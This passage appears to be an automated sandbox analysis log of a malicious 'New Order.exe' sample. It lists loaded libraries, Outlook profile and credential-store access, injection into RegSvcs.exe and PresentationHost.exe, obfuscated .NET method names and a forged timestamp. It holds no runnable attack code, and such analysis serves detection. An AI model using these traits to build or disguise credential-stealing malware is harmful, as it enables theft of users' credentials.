                Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\New Order.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: New Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: New Order.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: New Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: PresentationHost.pdbGCTL source: 9WAxm5F77VClmSoGxi.exe, 0000000D.00000003.1625113252.0000000001324000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb, source: PresentationHost.exe, 0000000E.00000002.2432624467.00000000029AE000.00000004.00000020.00020000.00000000.sdmp, PresentationHost.exe, 0000000E.00000002.2438416479.0000000004BCC000.00000004.10000000.00040000.00000000.sdmp, 9WAxm5F77VClmSoGxi.exe, 0000000F.00000002.2434352984.000000000241C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.1963615507.000000001EBEC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000008.00000002.1678088393.0000000000F60000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.1678088393.0000000000F60000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: PresentationHost.pdb source: 9WAxm5F77VClmSoGxi.exe, 0000000D.00000003.1625113252.0000000001324000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: PresentationHost.exe, 0000000E.00000002.2432624467.00000000029AE000.00000004.00000020.00020000.00000000.sdmp, PresentationHost.exe, 0000000E.00000002.2438416479.0000000004BCC000.00000004.10000000.00040000.00000000.sdmp, 9WAxm5F77VClmSoGxi.exe, 0000000F.00000002.2434352984.000000000241C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.1963615507.000000001EBEC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 9WAxm5F77VClmSoGxi.exe, 0000000D.00000000.1598722649.00000000005DF000.00000002.00000001.01000000.0000000D.sdmp, 9WAxm5F77VClmSoGxi.exe, 0000000F.00000000.1746838226.00000000005DF000.00000002.00000001.01000000.0000000D.sdmp

                Data Obfuscation

                barindex
                Source: 0.2.New Order.exe.7040000.5.raw.unpack, PuxQbnZvf6IpBXQW6M.cs.Net Code: qCxh5cpd2o System.Reflection.Assembly.Load(byte[])
                Source: New Order.exeStatic PE information: 0xE9FDDC5D [Wed May 26 16:05:49 2094 UTC]
                Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_0257F3A8 push ebx; retn 0004h0_2_0257F3C2
                Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_0257F440 push edi; retn 0004h0_2_0257F44A
                Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_0257F430 push esi; retn 0004h0_2_0257F43A
                Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_04C86B78 pushfd ; retn 5504h0_2_04C8791E
                Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_04C88FB0 push 00000002h; ret 0_2_04C88FC0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_04C8AAE9 push es; retf 0004h0_2_04C8AAEA
                Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_04C8ABD0 push es; retf 0004h0_2_04C8ABD2
                Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_04C8F5E9 push ds; retf 0004h0_2_04C8F5EA
                Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_04C8F6D2 push ds; retf 0004h0_2_04C8F702
                Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_04C8F70B push ds; retf 0004h0_2_04C8F71A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00418871 push eax; iretd 8_2_00418872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0041F834 push ss; iretd 8_2_0041F835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004120A7 push 3563E107h; iretd 8_2_004120AC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040216F push ss; iretd 8_2_00402170
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00403170 push eax; ret 8_2_00403172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040D1AD push es; iretd 8_2_0040D1C1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00413A53 push ebx; iretd 8_2_00413A5F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00401A1E push ss; iretd 8_2_00401A51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004082C5 push edi; iretd 8_2_004082C6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00401AE8 push ss; retf 8_2_00401AEA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00401A86 push ss; iretd 8_2_00401A51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00414B20 push 6BF5C304h; retf 8_2_00414B3E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00401576 push ss; iretd 8_2_0040158F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040166C push ss; retf 8_2_00401672
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004017E6 push ss; iretd 8_2_004017EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004197AC push 00000037h; retf 8_2_004197E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6225F pushad ; ret 8_2_00F627F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F627FA pushad ; ret 8_2_00F627F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6283D push eax; iretd 8_2_00F62858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F909AD push ecx; mov dword ptr [esp], ecx8_2_00F909B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F61368 push eax; iretd 8_2_00F61369
                Source: New Order.exeStatic PE information: section name: .text entropy: 7.894042811138585
                Source: 0.2.New Order.exe.7040000.5.raw.unpack, sCZkLnsolV4Et7w6d5.csHigh entropy of concatenated method names: 'ToString', 's0t2BX7dRi', 'hk92Yd21sr', 'KV22MWaQ9r', 'G262HSU1Sc', 'uQd2jLnIBQ', 'BlD23pcCAF', 'ItN2DDNjnk', 'H1G2Q8n3mE', 'KpO2nCE1oQ'
                Source: 0.2.New Order.exe.7040000.5.raw.unpack, W8kWeWl3G2Zi4mXUoY.csHigh entropy of concatenated method names: 'xeP5D42rJ', 'Gj9yDtts0', 'r3RdKSost', 'LiqLbdG1Q', 'oWDxYevSL', 'FEoiimqNt', 'wqpXrUfsSj4U7H0res', 'sctRB3B9w6RvGeixyo', 'ECpJuITY5', 'pfACDWjaI'
                Source: 0.2.New Order.exe.7040000.5.raw.unpack, WKAKM2i2fdDH1ne7Q1.csHigh entropy of concatenated method names: 'e6tPaMXPgZ', 'Ds8PLPUfhI', 'ojY4M9PjGb', 'Ddq4Hsdj89', 'Yrx4jfcvog', 'Flh43hXw59', 'iIj4Dp1aW3', 'ifj4QgP8wt', 'UJf4nft2Zb', 'Wqe4ehPeKo'
                Source: 0.2.New Order.exe.7040000.5.raw.unpack, uhnJmEWmMy1vFmU6kR.csHigh entropy of concatenated method names: 'uIOUelisPw', 'gjOUw1kG46', 'iEjUWO4gI8', 'H57UVJhIAJ', 'UUGUYCklas', 'HBJUM7ioWQ', 'rI4UHN5hNW', 'tX1UjvYK0L', 'OcHU3CfxfT', 'srFUD7J3x8'
                Source: 0.2.New Order.exe.7040000.5.raw.unpack, sYbfcVqLDPBO5G8ABg.csHigh entropy of concatenated method names: 'iyZC40QmBl', 'gpCCPpGF7H', 'TauCI4ivrQ', 'u9eC1GE6MX', 'iMuCoRNpjM', 'PQgCZQYaQD', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.New Order.exe.7040000.5.raw.unpack, p0b9U6YqRJcrwm0MjG.csHigh entropy of concatenated method names: 'oy04f6MwwESmK0TOUgB', 'hGFD83MehXiEePlutEO', 'sBxIJfLxbS', 'nIJIoa3pZu', 'OjgIC2sTvf', 'Yl1YPrMoD8n118BSQMb', 'uUmbg7MYdfj5UdJq7Lp'
                Source: 0.2.New Order.exe.7040000.5.raw.unpack, UvMACnndI0y5Z7MHmY.csHigh entropy of concatenated method names: 'Cel1ukpeQR', 'lJA1GXctiq', 'vVk15aBZTZ', 'tk01y6VaJJ', 'W2c1adKvnd', 'vJL1duMFoE', 'xPB1LQYY4s', 'LlV1XlEbPC', 'WER1x74pxU', 'wBY1iNPALZ'
                Source: 0.2.New Order.exe.7040000.5.raw.unpack, bJdUN3DS5kTJtGZnkJ.csHigh entropy of concatenated method names: 'I9P1OterG1', 'VPb14UYv1I', 'awx1IK3isk', 'r4CIqofJZM', 'OSCIzQLqRd', 'SV01622I1D', 'U7n1917mhY', 'Xs61luw5cJ', 'f9j1Rn94pk', 'XVo1hKXNG1'
                Source: 0.2.New Order.exe.7040000.5.raw.unpack, iSKFC7bB0iRFfX322e.csHigh entropy of concatenated method names: 'qEYocuWxpE', 'J9KoYwiFre', 'WEFoMYiNX9', 'ntaoH5OCco', 'YMJojXDmru', 'wGNo3LGe2b', 'T42oDCcjmV', 'mcmoQrJex1', 'j47onWAdYP', 'RuCoeRQnnT'
                Source: 0.2.New Order.exe.7040000.5.raw.unpack, VAx6w3cqoedTrmxJwE.csHigh entropy of concatenated method names: 'vB4IKhiNg7', 'QClI7D9MvP', 'mHYIP8TliE', 'CK4I1aJdJ9', 'AZnIZcqSjR', 'EoVP0qTSyu', 'aoQPgLFKgK', 'EaBPvLkcLq', 'KDWPmMSQMe', 'fn4PbvVZn2'
                Source: 0.2.New Order.exe.7040000.5.raw.unpack, pyEFgY70T1SyqTEOB5.csHigh entropy of concatenated method names: 'Dispose', 'fhs9bRsX4C', 'ENTlYqibQt', 'sMvfeDbU9A', 'QVq9qDBQIt', 'zhQ9z8Ugv0', 'ProcessDialogKey', 'U2Il6SKFC7', 'O0il9RFfX3', 'p2ellCYbfc'
                Source: 0.2.New Order.exe.7040000.5.raw.unpack, QyCIqn8HVAAvGZBYcL.csHigh entropy of concatenated method names: 'gUJFXMcWJa', 'AZSFxepHiy', 'TynFcQCGkR', 'hBXFYtiFaO', 'aV5FHccDnW', 'X3QFjgZ6Wb', 'eayFDXqS4l', 'zxiFQ0sPue', 'eKdFeEJ7il', 'j7QFBAQgd0'
                Source: 0.2.New Order.exe.7040000.5.raw.unpack, UFJM0q96sBxbo5B3aXW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ugHCBfQdlO', 'yTQCwlR3Cr', 'P6eC8UATxG', 'dOgCW4e4wE', 'ek9CVCPfT3', 'DE3Cs5ee4X', 'yAxCNdQsp7'
                Source: 0.2.New Order.exe.7040000.5.raw.unpack, PuxQbnZvf6IpBXQW6M.csHigh entropy of concatenated method names: 'grERKCJbTR', 'TrMRO7U7Ms', 'JfNR7CFO0H', 'J0OR4ToR9x', 'JobRPvXfc2', 'zBeRIWDODC', 'KN4R1T4SSE', 'mPwRZmCMTo', 'CfhRSnFQMY', 'HgBRfwCBLs'
                Source: 0.2.New Order.exe.7040000.5.raw.unpack, VnUW3Kvv6OhsRsX4C8.csHigh entropy of concatenated method names: 'qTOoUVkU7r', 'FagokDvylY', 'I0Moo5t6c5', 'dMWotJ5LkF', 'yAooppC4H7', 'f4CoTISXUx', 'Dispose', 'O9hJOinpRg', 'lY1J7bWG7t', 'P0IJ4PUPKA'
                Source: 0.2.New Order.exe.7040000.5.raw.unpack, wrgHL7hb7bT5GL6OP3.csHigh entropy of concatenated method names: 'oyq91NvBK2', 'SSJ9ZC1fts', 'f3H9fbJVFc', 'rmW9r4vKAK', 'Ne79UQ1gAx', 'aw392qoedT', 'TD8J4NIdngu5gW3scN', 'JXMO3o85ouyl27557f', 'y6Q99lXN6H', 'nuu9Ra23sx'
                Source: 0.2.New Order.exe.7040000.5.raw.unpack, wYqExOx3HbJVFcomW4.csHigh entropy of concatenated method names: 'oxO4yYJnSn', 'uau4dmCHp8', 'IUD4Xmm06j', 'rrF4xau1cC', 'NaF4UObqjE', 'UsE42cbGUe', 'RJj4knWnHo', 'FXE4JerPbV', 'cD74oWgOC2', 'WMA4Co1w8w'
                Source: 0.2.New Order.exe.7040000.5.raw.unpack, mWgERuzcxafZmsb54m.csHigh entropy of concatenated method names: 'GMYCdpVPTp', 'RF1CX4DYaN', 'XRICx53iXW', 'yB4Ccblpr4', 'PuSCYwBqGf', 'x2tCH5c5Fa', 'dE9Cjl04fr', 'uiBCT9AwOf', 'MnhCuHuGGQ', 'gHDCGd0LHC'
                Source: 0.2.New Order.exe.7040000.5.raw.unpack, OIp7Em991BmEI8L1m7G.csHigh entropy of concatenated method names: 'y2mCqj11fM', 'Yp6CzRR460', 'LnCt6s7Apk', 's5Tt9ui697', 'PKQtlgbXKe', 'J8GtRYLoJd', 'Sb6thDY52L', 'CLEtKaGs5G', 'X8OtOHnRdi', 'B1rt7UnihE'
                Source: 0.2.New Order.exe.7040000.5.raw.unpack, YNvBK2XsSJC1fts12G.csHigh entropy of concatenated method names: 'nTZ7WVvygr', 'ACP7Vo6PSv', 'gT67sp9sa2', 'hch7Nqpn36', 'YVD70MYrGb', 'bid7gEZ6ZW', 'U0L7vokwgA', 'HWQ7mVwUb5', 'Fqy7bYMBnc', 'NbU7q7La40'
                Source: 0.2.New Order.exe.7040000.5.raw.unpack, QRUyXOgI0cOBYkjVhY.csHigh entropy of concatenated method names: 'MwAkmC70Np', 'UvakqwSS9M', 'BRhJ6TP9oO', 'nOGJ9bjuWL', 'LgykBZ2wn2', 'aWykwgvqKC', 'bfNk8ebPk0', 'iQjkWF1eIG', 'sS5kV0paPa', 'C5NksujfXx'

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
